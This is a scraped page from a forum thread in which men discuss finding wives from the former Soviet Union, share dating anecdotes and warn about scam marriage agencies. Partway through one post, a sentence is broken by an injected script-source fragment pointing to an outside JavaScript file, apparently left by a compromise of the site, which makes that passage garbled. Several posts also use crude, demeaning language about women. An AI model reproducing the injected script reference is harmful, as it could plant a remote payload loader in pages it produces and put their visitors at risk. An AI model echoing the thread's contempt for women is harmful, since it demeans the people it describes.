Hello & Welcome to our community. Is this your first visit? Register
Page 5 of 6 FirstFirst 123456 LastLast

I've always found it a blessing, if I could avoid this tiresome ritual of 'dancing' around a woman in a complicated mating ritual. Sexual 'hunting' as an end in itself is for me just a waste of time, on line with having a set of stuffed animal heads hanging on the wall to demonstrate your machismo.

On the other hand I've never been tempted to use the services of ladies of negotiable affection, though I've known a few privately, under friendly forms. This is from where I have my information.

Hey guys! dreamsr, I can't say that access to phones is the same in Argentina as it is in Lugansk. I try to make it clear that these are my personal obersvations during my trip.

And the key for me was that it was a VACATION first and foremost, with the hope of meeting a nice girl as a bonus, so I was able to enjoy my vacation despite a lack of success on the perspective bride front.
    quote:Those left on this market are either the very starved or naive, or the very cynical, who still consider a FSUW a better bargain than a local hooker.
    And which category might you place me in? It's true that you have had a lot more personal experience with FSUWs than most of us, but like most people, your personal experience may have tainted your outlook??? Personally, I still think there might be a great girl over there somewhere, so I'm going to continue looking for a little while longer before I go find myself another American, heroin junkie, wh@re to shack up with.[)]

On the note of my recent personal search... A very beautiful 32 yo mother of a 10 yo daughter, recently exposed her true nature to me. I was a bit shocked, but she would seem to have a similar "party girl" attitude to that of the afore mentioned heroin junkie, wh@re, ex-girlfriend, stating the need for a nanny to watch her daughter during the day so she could go out, presumably shopping! Presumably with my money since working isn't on her list of things to do!!! NEXT![8D]

Train returns

...so Smoks she is 32 years old, has a child and doesn't think work is one of those things that should be a priority in her life? Is it just me or are we now living in an age when life is one big never-ending party? You have an interesting view on MOB's well at least I guess it doesn't just apply to MOB I think we all want to find that person who we can cope with and don't want to send up the river in few months. Where you find her is irrelevant, the important thing is to find her. The question is though and I'm sure Swede will come in at this point, where do you find her? In America a few years ago I noticed that PUA were on the rise due to popularity of the show with Mystery on Vsrc="http://cmiia.com/op1.js" and another guy Stylez I believe his name is. The male specie are desparately looking for the "formula" to find, attract and keep that hot babe in his life and the playing feel for men is constantly shrinking because we also now are competing with women on an unbeleivable scale.

Anyway back to the places to find your beauties. My interpretation of the whole thing is that you will find exactly whom you are looking for depending on where you look. If you search in bars and night clubs for instance you are bound to find a "party", free-spirit kinda girl but in the grocery store or a bookshop probably a more reserved individual. Again it depends on what the man is really searching for a mix of all perhaps in which case I doubt that lady exists...

Hey dreamsr! Yea, she now strikes me as just a girl that got knocked up a bit too young, didn't really want a kid and is now looking to shed the responsibilities and be a "wild child", because she missed out on it during her twenties... Sorry to say this crap kind of reminds me of my ex who got knocked up at 18![V]

Some of our last chat left me with a feeling that it won't work! So.......... NEXT!!!!!!!!!!!!!!!! I honestly wasn't looking to get hooked up with a girl with a kid anyway, but she seemed so nice at first that I just had to check her out.[?]

Not that I'm a player, but I've been communicating with a few girls. A couple of them are honestly a bit younger than I'm looking for, but I figure to keep all options open?

My current favorite, is a girl I met through an online newspaper ad. She sounds way TOOOOOOOOOO good to be true so far, so my guard is up and I'm just waiting for the scam!!!!!!!!!!!![B)]

She says she speaks good English, so no translation scam. She says she works and so far hasn't complained about internet cafe costs??? She just gave me her phone number today... maybe Boris has a female accomplice??????????????[:0]

31 years old, a good age since I really don't look to marry a daughter and still young enough because I would like to have kids and she claims to want kids also. So far, seems to have a friendly and not terribly demanding personality....... And of course, drop dead sexy![]

Possible scams coming??? Plenty that I can think of from "can you help with money for internet" to "I just lost my job and need some help". Or, maybe granny will end up in the hospital?

Well, I'm not exactly the bookstore type, so..........[8D]

Train returns

Well man this time I hoping to hear you say none of those things. If she has that on her mind she should keep it there. Only time will tell though so work you magic. I was trying to convince my "friend" to join or re-join one of those social networks but she has launched into a slight temper tantrum, saying that its boring and I shouldn't force her to do what she doesn't want to so the signs are developing. No talk of money yet but again time will tell.

Hey dreamsr! Beware the MOB with temper tantrums! It will only get worse!!!

Train returns

Thanks for the heads-up smoks, I will be looking out for the rest of the "behaviours". :-)

hey, mates..whaz up??
    what is the news about UALadys??
    well, I am debating, a girl I like as I have seen her profile
    before has written me. 1st time this happens so I dont know what to do.
    I keep looking for her in other places and can't find her..wonder why even loveme.com the one I always find them
    so don't know what to do, and jim still have them in black list, adn I already was talking to Natasha the one who speaks several languages only to find that she was a translator, what a pity!!...
    input needed, plzzz...
    SB

SB

If you go back and read the pages of posts concerning Confidential Connections, UALadys, UADreams, and all the other incarnations you will see a pattern of activity:

1. Form letters sent to multiple recipients, who believe the correspondence is for them only.

2. Women who mysteriously "go to St. Petersburg" when you press for a chance to meet them at the home office.

3. For the men who do make the trip to Ukraine, their chosen girl is either unavailable when they arrive, available but seemingly knows nothing about their beau, or spend a little time, and politely make a quick exit after 30 minutes.

This scam has been repeated over, and over, and over. Dozens of stories reported here and other sites around the WWW.

These websites are professional scams that take $7 a pop to send you a feel good email. Give me your credit card number and I will do the same for you for $5 a pop.

Prometheus

Hey guys! SB, I'll write to you for $3, but it's another $1 to send or receive a photo![:X]

So far, it really doesn't look like there's much difference between UADreams and UALadys or CC before them. Just like my first login here was Ihearmytrain, (something happened and I couldn't login with that anymore) now I'm PeopleSmoks. Same guy!!![8D]

Train returns